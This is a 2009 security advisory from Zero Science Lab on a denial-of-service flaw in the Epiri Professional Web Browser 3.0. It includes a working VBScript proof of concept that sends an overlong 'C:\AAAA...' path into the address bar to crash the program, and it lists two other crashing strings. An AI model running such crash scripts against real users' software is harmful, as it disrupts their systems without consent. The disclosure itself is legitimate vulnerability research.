Epiri Professional Web Browser 3.0 Remote Crash Exploit

2009-07-30T00:00:00
ID ZSL-2009-4923
Type zeroscience
Reporter Gjoko Krstic
Modified 2009-07-30T00:00:00

Description

Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit
Advisory ID: ZSL-2009-4923
Type: Local/Remote
Impact: DoS
Risk: (2/5)
Release Date: 30.07.2009

Summary

Epiri Professional 3.0 is an impressive, user-focused, next-generation alternative internet program featuring faster internet, digital clarity and the latest technological design. Microsoft Silverlight is required.

Description

Epiri Professional Web Browser suffers from a denial of service vulnerability: the application crashes when one of the 3 vulnerable strings ('file://', 'C::' and 'C:\AAAA...AAAA' [257]) is typed into the address bar, or when a malicious .vbs script file is opened locally or remotely. Vulnerable Mode: Browse Internet.

Vendor

Horizon Software Co. - <http://www.horizonum.com>

Affected Version

3.0.0.00

Tested On

Microsoft Windows XP Professional SP3 (English)

Vendor Status

N/A

PoC

epiri_crash.vbs

Credits

Vulnerability discovered by Gjoko Krstic - <gjoko@zeroscience.mk>
Exploit coded by sm - <sm@zeroscience.mk>

References

[1] <http://securityreason.com/exploitalert/6777>
[2] <http://www.packetstormsecurity.org/filedesc/epiri-dos.txt.html>
[3] <http://www.milw0rm.com/exploits/9304>
[4] <http://sebug.net/exploit/11951>

Changelog

[30.07.2009] - Initial release

Contact

Zero Science Lab

Web: <http://www.zeroscience.mk>
e-mail: lab@zeroscience.mk

' Title: Epiri Professional Web Browser 3.0 Remote Crash Exploit

' Vendor: Horizon
' Product Web Page: http://www.horizonum.com/
' Current Version: 3.0.0.00
' Note: Microsoft Silverlight
' Vulnerable Mode: Browse Internet
' Tested On Microsoft Windows XP Professional SP3 (En)

' Vulnerable strings:

' file://
' C::
' C:\AAAA...AAAA [257]
'

' Vulnerability Discovered By Gjoko 'LiquidWorm' Krstic
' liquidworm gmail com
' http://www.zeroscience.org/
' 28.07.2009


' Working PoC: http://zeroscience.org/codes/epiri_crash.vbs

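Dim crash

Set crash = CreateObject("WScript.Shell")

With crash

' Loop until the Epiri window exists and has been given focus
Do Until Success = True
Success = crash.AppActivate("Epiri Professional 3.0")
Loop

' Alternative vulnerable strings (disabled)
'.SendKeys "file://"
'.SendKeys "C::"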
.SendKeys "C:\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"

.SendKeys "~" 'Return

End With

WScript.Quit